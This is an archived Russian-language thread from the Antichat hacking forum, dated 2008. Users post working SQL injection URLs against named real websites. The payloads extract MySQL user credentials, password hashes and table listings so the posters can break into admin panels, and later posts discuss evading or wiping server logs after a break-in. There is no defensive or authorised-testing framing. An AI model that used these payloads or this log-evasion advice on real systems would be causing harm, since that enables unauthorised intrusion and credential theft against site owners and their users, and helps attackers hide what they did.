ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
02.09.2008, 00:47
|
|
Новичок
Регистрация: 04.09.2007
Сообщений: 13
Провел на форуме:
29295
Репутация:
4
|
|
MirA спасибо. Люди, а как быть здесь, есть вот чего
http://www.sarbc.ru/tvnew/print.phtml?type=2&channel_id=-1+union+select+concat_ws(0x3a,version(),user,passw ord),2,3+from+mysql.user+limit+34,50/*
http://www.sarbc.ru/tvnew/print.phtml?type=2&channel_id=-1+union+select+concat_ws(0x3a,version(),login,pass wd),2,3+from+user+limit+18,5/*
Но логины не подходят к админке http://www.sarbc.ru/admin
И хэш декодеры говорят, что мол, формат неверный, как быть-то вроде всё ж на ладони. Поможите пожалуйста, заранее благодарен.
|
|
|
02.09.2008, 00:59
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от masterBlack
1)http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,table_name,5,6+from+informati on_schema.tables/* -фсЁ ок)
2)http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,column_name,5,6+from+informat ion_schema.columns+where+table_name=0x7573657273/* -фсЁ ок)
3 финал) http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,concat_ws(0x3,password),5,6+f rom+users/*
Вы прикалываетесь? Или я тупой? Где там инъекция? Или вы даёте советы даже не ходя по ссылкам?
|
|
|
|
02.09.2008, 01:10
|
|
Познающий
Регистрация: 27.05.2008
Сообщений: 51
Провел на форуме:
611529
Репутация:
41
|
|
Сообщение от jokester
tor4),MirA
Вы прикалываетесь? Или я тупой? Где там инъекция? Или вы даёте советы даже не ходя по ссылкам?
Проверил, инекция была и сплыла) Быстро работают админы.
Думаю пароли тоже сменил.
Последний раз редактировалось tor4); 02.09.2008 в 01:20..
|
|
|
|
02.09.2008, 01:19
|
|
Новичок
Регистрация: 12.06.2008
Сообщений: 19
Провел на форуме:
70897
Репутация:
3
|
|
Ясн...:-(:-(:-(
Последний раз редактировалось masterBlack; 02.09.2008 в 01:35..
|
|
|
|
02.09.2008, 01:34
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
вообще-то логи ведутся всегда (если конечно админ сам не отключил логирование).. другой вопрос смотрит ли админ в эти логи... если смотрит, то все ваши запросы там есть, значит видно где дырка и ее нужно исправить=)
|
|
|
|
02.09.2008, 01:38
|
|
Новичок
Регистрация: 12.06.2008
Сообщений: 19
Провел на форуме:
70897
Репутация:
3
|
|
Ясн...а мона этого как то избежат?
ну чтоб мои запросы не попадали в логи...
|
|
|
|
02.09.2008, 01:42
|
|
Новичок
Регистрация: 12.06.2008
Сообщений: 19
Провел на форуме:
70897
Репутация:
3
|
|
А Моя айпиха тож там светица?
|
|
|
|
02.09.2008, 01:48
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
Избежать нельзя.. Если только после взлома как такого не почистить логи. Твой Ip так же записывается в логах.
|
|
|
|
02.09.2008, 01:58
|
|
Новичок
Регистрация: 12.06.2008
Сообщений: 19
Провел на форуме:
70897
Репутация:
3
|
|
Ясн...
мля чувствую влипну кодат по неопытности...я то думал носки одевать кода в админику вхожу...а оно...
|
|
|
|
02.09.2008, 02:11
|
|
Познающий
Регистрация: 27.05.2008
Сообщений: 51
Провел на форуме:
611529
Репутация:
41
|
|
Что-же чистить после взлома?
Или где же эти логи?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
